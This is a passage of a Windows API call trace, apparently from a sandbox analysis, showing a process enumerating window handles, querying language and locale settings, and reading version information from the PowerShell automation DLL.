	[0085.480] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8c0
	[0085.480] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8b0
	[0085.480] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8a0
	[0085.480] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x890
	[0085.480] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x880
	[0085.480] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x870
	[0085.480] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x860
	[0085.480] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x850
	[0085.481] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x840
	[0085.481] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x830
	[0085.481] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x820
	[0085.481] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x810
	[0085.481] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x20c
	[0085.481] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7c4
	[0085.481] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0xc0
	[0085.481] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x688
	[0085.481] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x6c0
	[0085.481] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x408
	[0085.481] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7d4
	[0085.482] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x544
	[0085.482] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x540
	[0085.482] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x71c
	[0085.482] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x31c
	[0085.482] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7ec
	[0085.482] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x5b8
	[0085.482] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x754
	[0085.482] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x664
	[0085.482] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x640
	[0085.482] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x700
	[0085.483] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x410
	[0085.483] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7a0
	[0085.483] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x3b4
	[0085.483] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x5cc
	[0085.483] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x5d4
	[0085.483] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7c0
	[0085.483] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x364
	[0085.483] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x240
	[0085.483] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x560
	[0085.483] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x57c
	[0085.484] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7b0
	[0085.484] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x6a4
	[0085.484] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x32c
	[0085.484] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x670
	[0085.484] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4f0
	[0085.484] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x514
	[0085.484] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x50c
	[0085.484] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x514
	[0085.484] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x50c
	[0085.484] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x514
	[0085.484] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4f0
	[0085.485] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4f0
	[0085.485] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x58c
	[0085.485] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x578
	[0085.485] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x458
	[0085.485] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x530
	[0085.485] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.485] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x508
	[0085.485] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.485] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4f4
	[0085.485] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.485] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.486] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x794
	[0085.486] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.486] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.486] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x458
	[0085.486] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x458
	[0085.486] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x448
	[0085.486] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x778
	[0085.486] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x458
	[0085.486] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x538
	[0085.486] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.487] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4ac
	[0085.487] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9f4
	[0085.487] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x964
	[0085.487] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9e8
	[0085.487] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9e8
	[0085.487] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0xb40
	[0085.487] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0xa00
	[0085.487] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9f0
	[0085.487] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9e0
	[0085.487] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9d0
	[0085.487] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9c0
	[0085.488] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9b0
	[0085.488] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x9a0
	[0085.488] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x990
	[0085.488] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x980
	[0085.488] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x970
	[0085.488] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x960
	[0085.488] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x950
	[0085.488] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x940
	[0085.488] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x930
	[0085.488] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x920
	[0085.488] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x910
	[0085.489] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x900
	[0085.489] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8f0
	[0085.489] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8e0
	[0085.489] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8d0
	[0085.489] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8c0
	[0085.489] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8b0
	[0085.489] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x8a0
	[0085.489] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x890
	[0085.490] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x880
	[0085.490] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x870
	[0085.490] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x860
	[0085.490] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x850
	[0085.490] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x840
	[0085.490] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x830
	[0085.490] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x820
	[0085.490] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x810
	[0085.490] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x20c
	[0085.490] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7c4
	[0085.490] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0xc0
	[0085.491] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x688
	[0085.491] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x6c0
	[0085.491] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x408
	[0085.491] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7d4
	[0085.491] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x544
	[0085.491] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x540
	[0085.491] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x71c
	[0085.491] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x31c
	[0085.491] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7ec
	[0085.491] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x5b8
	[0085.491] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x754
	[0085.492] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x664
	[0085.492] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x640
	[0085.492] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x700
	[0085.492] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x410
	[0085.492] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7a0
	[0085.492] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x3b4
	[0085.492] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x5cc
	[0085.492] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x5d4
	[0085.492] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7c0
	[0085.492] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x364
	[0085.493] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x240
	[0085.493] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x560
	[0085.493] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x57c
	[0085.493] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x7b0
	[0085.493] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x6a4
	[0085.493] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x32c
	[0085.493] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x670
	[0085.493] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x50c
	[0085.493] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x514
	[0085.493] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4f0
	[0085.493] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x58c
	[0085.494] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x458
	[0085.494] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x4f4
	[0085.494] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x794
	[0085.494] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x458
	[0085.494] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x16dde0 | out: lpdwProcessId=0x16dde0) returned 0x778
	[0085.497] WerSetFlags () returned 0x0
	[0085.505] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0085.505] CoTaskMemFree (pv=0x0) 
	[0085.506] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e148, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e140 | out: pulNumLanguages=0x16e148, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e140) returned 1
	[0085.507] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e148, pwszLanguagesBuffer=0x2d828e8, pcchLanguagesBuffer=0x16e140 | out: pulNumLanguages=0x16e148, pwszLanguagesBuffer=0x2d828e8, pcchLanguagesBuffer=0x16e140) returned 1
	[0085.512] CoTaskMemAlloc (cb=0x24) returned 0x2dc5e0
	[0085.512] GetUserDefaultLocaleName (in: lpLocaleName=0x2dc5e0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0085.513] CoTaskMemFree (pv=0x2dc5e0) 
	[0085.543] CoTaskMemAlloc (cb=0x104) returned 0x2c6f80
	[0085.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c6f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0085.543] CoTaskMemFree (pv=0x2c6f80) 
	[0085.546] CoTaskMemAlloc (cb=0x104) returned 0x2c6f80
	[0085.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c6f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0085.546] CoTaskMemFree (pv=0x2c6f80) 
	[0085.548] CoTaskMemAlloc (cb=0x104) returned 0x2c6f80
	[0085.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c6f80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0085.548] CoTaskMemFree (pv=0x2c6f80) 
	[0085.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0085.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0085.562] SetErrorMode (uMode=0x1) returned 0x1
	[0085.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16ddc0 | out: lpFileInformation=0x16ddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0085.562] SetErrorMode (uMode=0x1) returned 0x1
	[0085.562] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16e030 | out: lpdwHandle=0x16e030) returned 0x94c
	[0085.583] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d86178 | out: lpData=0x2d86178) returned 1
	[0085.585] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dfa8, puLen=0x16dfa0 | out: lplpBuffer=0x16dfa8*=0x2d86214, puLen=0x16dfa0) returned 1
	[0085.585] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x2d862f0, puLen=0x16df10) returned 1
	[0085.585] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0085.585] CoTaskMemAlloc (cb=0x2e) returned 0x2e1580
	[0085.585] lstrcpyW (in: lpString1=0x2e1580, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0085.585] CoTaskMemFree (pv=0x2e1580) 
	[0085.585] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x2d86344, puLen=0x16df10) returned 1
	[0085.585] lstrlenW (lpString="System.Management.Automation") returned 28
	[0085.585] CoTaskMemAlloc (cb=0x3c) returned 0x2e2a20
	[0085.585] lstrcpyW (in: lpString1=0x2e2a20, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0085.585] CoTaskMemFree (pv=0x2e2a20) 
	[0085.585] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x2d863a0, puLen=0x16df10) returned 1
	[0085.585] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0085.585] CoTaskMemAlloc (cb=0x20) returned 0x2dc640
	[0085.585] lstrcpyW (in: lpString1=0x2dc640, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0085.585] CoTaskMemFree (pv=0x2dc640) 
	[0085.585] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x2d863e0, puLen=0x16df10) returned 1
	[0085.586] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0085.586] CoTaskMemAlloc (cb=0x44) returned 0x2e2a20
	[0085.586] lstrcpyW (in: lpString1=0x2e2a20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0085.586] CoTaskMemFree (pv=0x2e2a20) 
	[0085.586] VerQueryValueW (in: pBlock=0x2d86178, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16df18, puLen=0x16df10 | out: lplpBuffer=0x16df18*=0x2d86448, puLen=0x16df10) returned 1
	[0085.586] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
